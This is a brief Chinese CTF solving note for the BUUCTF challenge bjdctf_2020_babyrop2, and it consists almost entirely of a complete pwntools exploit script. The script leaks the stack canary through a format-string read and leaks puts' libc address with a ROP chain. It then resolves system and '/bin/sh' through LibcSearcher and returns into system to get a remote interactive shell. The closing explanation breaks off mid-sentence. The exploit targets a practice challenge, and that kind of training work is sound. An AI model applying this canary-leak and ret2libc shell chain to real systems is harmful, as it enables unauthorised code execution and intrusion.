buuctf bjdctf_2020_babyrop2做题笔记

from pwn import *
from LibcSearcher import *
proc_name = '/home/pwn/Desktop/bjdctf_2020_babyrop2'
p = remote('node3.buuoj.cn', 27642)
elf = ELF(proc_name)
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']
rdi=0x400993
p.sendlineafter("I'll give u some gift to help u!\n",'%7$p')
p.recvuntil('0x')
canary = int(p.recv(16),16)
payload=p64(canary)
payload=payload.rjust(0x20,b'a')
payload+=b'aaaaaaaa'
payload+=p64(rdi)
payload+=p64(puts_got)+p64(puts_plt)+p64(main)
p.sendlineafter('Pull up your sword and tell me u story!\n',payload)
puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)
base=puts_addr-libc.dump('puts')
system=base+libc.dump('system')
bin_sh=base+libc.dump('str_bin_sh')
payload=p64(canary)
payload=payload.rjust(0x20,b'a')
payload+=b'aaaaaaaa'+p64(rdi)+p64(bin_sh)+p64(system)+p64(0)
p.sendlineafter("I'll give u some gift to help u!\n",'%7$p')
p.sendlineafter('Pull up your sword and tell me u story!\n',payload)
p.interactive()

做题思路 ，泄露canary地址，最后构造